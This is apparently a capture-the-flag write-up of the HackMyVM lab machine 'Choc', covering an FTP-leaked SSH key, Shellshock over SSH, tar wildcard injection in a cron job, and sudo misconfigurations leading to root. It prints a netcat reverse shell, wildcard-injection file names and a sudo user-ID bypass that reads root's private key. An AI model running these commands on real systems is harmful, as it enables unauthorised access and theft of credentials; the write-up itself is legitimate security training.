HMV Choc Summary

2026-04-23 2026-04-23451 Words

This Linux machine leaks private key of SSH with FTP service, but limit its capability by shellshock vulnerability. After bypass this constriction I obtain the foothold. Then the misconfiguration of cron allow me to execute arbitrary command to pivot to another user, with the vulnerable sudo rule, I successfully lateral to root.

Scope

  • Name: Choc
  • Difficulty: (5/10)
  • OS: Linux
  • IP: choc.hmv (192.168.56.147)

Enumeration

FTP

At first, I obtain a private key of ssh from FTP scanning result. 

21/tcp open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 0        0            1811 Apr 20  2021 id_rsa [NSE: writeable]

I realize that this private key belongs to user carl from ssh-kegen -y -f id_rsa.

Shellshock for SSH

Then I directly login with that key, unfortunately, I'm kicked out immediately. Then I google for this situation and find this how can shellshock be exploited over SSH. According to this post, I successfully get a reverse shell. 

carl@choc:~$ cat .ssh/authorized_keys
command="cat ~/troll.txt" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCxAJzNHJ+k1YTZSCqbdmY4jXCNGuDrEeHLmsEHMDkiHpT1y+IeLVxy
UurWkDwwWAes78bfHHkXbINVj7491EjoH3r4OwxhhZa4z9mtWaJlWtdllzEysC6GUr1TIPXc3vZkiPbUuAWYrz4bHbpQoIuYl+cAgOKPKbFRRhfLIOqk+1
bsM+LVcWgwT5ZICpxiTOiISNAUPgInrBKkrlFott+jNPuZwTy/yV7Ix4CejknMGg1MquyP+2LyzeEpmf+OcwoS5r/jVWlSddO1Fim373lTNpDOKj2kwNsa
9zO/9jAjN7uhu1mh7wb8ldU0ImCep4C6drJSTbfYOLlV7rLgfH0X carl@choc

Pririlege Escalation

User Infos 
carl@choc:~$ ls -al /home/
total 20
drwxr-xr-x  5 root  root  4096 Apr 18  2021 .
drwxr-xr-x 19 root  root  4096 Apr 18  2021 ..
drwxr-xr-x  5 carl  carl  4096 Apr 20  2021 carl
drwxrwx---  5 sarah torki 4096 Apr 20  2021 sarah
drwxr-xr-x  6 torki torki 4096 Apr 19  2021 torki

carl@choc:~$ ls -al /home/torki/
total 44
drwxr-xr-x 6 torki torki 4096 Apr 19  2021 .
drwxr-xr-x 5 root  root  4096 Apr 18  2021 ..
-rwx------ 1 torki torki   71 Apr 18  2021 backup.sh
lrwxrwxrwx 1 root  root     9 Apr 18  2021 .bash_history -> /dev/null
-rw-r--r-- 1 torki torki  220 Apr 12  2021 .bash_logout
-rw-r--r-- 1 torki torki 3526 Apr 12  2021 .bashrc
drwx------ 3 torki torki 4096 Apr 12  2021 .gnupg
drwxr-xr-x 3 torki torki 4096 Apr 18  2021 .local
-rw-r--r-- 1 torki torki  807 Apr 12  2021 .profile
drwxrwxrwx 2 torki torki 4096 Apr 20  2021 secret_garden
-rw-r--r-- 1 torki torki   66 Apr 18  2021 .selected_editor
drwx------ 2 torki torki 4096 Apr 12  2021 .ssh

Notice that:

  • The secret_garden directory of user torki is world writable.
  • There's a backup.sh script maybe useful.

carl -> torki

I get nothing interesting after some basic investigation except this compressed file. 

carl@choc:~$ find / -user torki -or -group torki 2>/dev/null
/home/sarah
/home/torki
/home/torki/.profile
/home/torki/.selected_editor
/home/torki/secret_garden
/home/torki/secret_garden/diary.txt
/home/torki/.bash_logout
/home/torki/.bashrc
/home/torki/.gnupg
/home/torki/.local
/home/torki/.local/share
/home/torki/.ssh
/home/torki/backup.sh
/tmp/backup_home.tgz

The /tmp/backup_home.tgz is the compressed version of files within that secret_garden directory. So I guess the user torki may configure a cronjob to backup its home secret_garden with backup.sh script. Then I quickly confirm this with pspy. 

2026/04/23 09:28:01 CMD: UID=1000  PID=1350   | /bin/sh -c bash /home/torki/backup.sh
2026/04/23 09:28:01 CMD: UID=1001  PID=1349   | /bin/sh -c PATH=.:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/g
ames && export PATH &&  bash /home/sarah/.local/script.sh
2026/04/23 09:28:01 CMD: UID=1001  PID=1351   | bash /home/sarah/.local/script.sh
2026/04/23 09:28:01 CMD: UID=1000  PID=1352   | bash /home/torki/backup.sh

Now things is very straightforward, I could leverage tar which called by backup.sh to execute arbitrary command. refer: https://gtfobins.org/gtfobins/tar/ 

touch -- '--checkpoint=1'
touch -- '--checkpoint-action=exec=sh pwn.sh'
echo 'nc 192.168.56.1 1234 -e /bin/bash' > pwn.sh && chmod +x pwn.sh

torki -> sarah

backup.sh 
torki@choc:~$ cat backup.sh
#!/bin/bash
cd /home/torki/secret_garden
tar cf /tmp/backup_home.tgz *

The sudo rule of user torki hint me that: 

User torki may run the following commands on choc:
    (sarah) NOPASSWD: /usr/bin/scapy

So I lateral to user sarah by this Python program. 

                     aSPY//YASa
             apyyyyCY//////////YCa       |
            sY//////YSpcs  scpCY//Pp     | Welcome to Scapy
 ayp ayyyyyyySCP//Pp           syY//C    | Version 2.4.0
 AYAsAYYYYYYYY///Ps              cY//S   |
         pCCCCY//p          cSSps y//Y   | https://github.com/secdev/scapy
         SPPPP///a          pP///AC//Y   |
              A//A            cyP////C   | Have fun!
              p///Ac            sC///a   |
              P////YCpc           A//A   | Craft packets like it is your last
       scccccp///pSP///p          p//Y   | day on earth.
      sY/////////y  caa           S//P   |                      -- Lao-Tze
       cayCyayP//Ya              pY/Ya   |
        sY/PsY////YCc          aC//Yp
         sc  sccaCY//PCypaapyCP//YSs
                  spCPY//////YPSps
                       ccaacs

>>> import pty
>>> pty.spawn("/bin/bash")
sarah@choc:~$ id
uid=1001(sarah) gid=1001(sarah) groups=1001(sarah)

sarah -> root

The same as user torki, sarah also has a flaw sudo rule and sudo version. 

User sarah may run the following commands on choc:
    (ALL, !root) NOPASSWD: /usr/bin/wall

Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23

By exploit with following payload refer:https://gtfobins.org/gtfobins/wall/ 

sudo -u#-1 /usr/bin/wall --nobanner /root/.ssh/id_rsa

I could to read arbitrary file, and for this the private key of root will be sent to other users of the system.

Creator: Emacs 31.0.50 (Org mode 10.0-pre)